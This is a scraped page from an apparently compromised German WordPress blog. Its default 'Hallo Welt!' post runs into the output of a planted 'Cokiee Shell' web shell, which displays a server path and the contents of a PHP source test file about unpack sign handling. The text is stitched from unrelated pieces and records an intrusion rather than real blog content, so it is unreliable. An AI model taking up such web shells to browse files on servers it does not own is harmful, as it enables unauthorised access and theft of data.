Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/strings/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/strings/bug61764.phpt |
--TEST-- Bug #61764: 'I' unpacks n as signed if n > 2^31-1 on LP64 --SKIPIF-- <?php if (PHP_INT_SIZE != 8) die("skip this test is for 64bit platform only"); --FILE-- <?php //expected -30000 mod 2^32 = 4294937296, and not -30000 //because we can represent 4294937296 with our PHP int type print_r(unpack('I', pack('L', -30000))); --EXPECT-- Array ( [1] => 4294937296 )
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare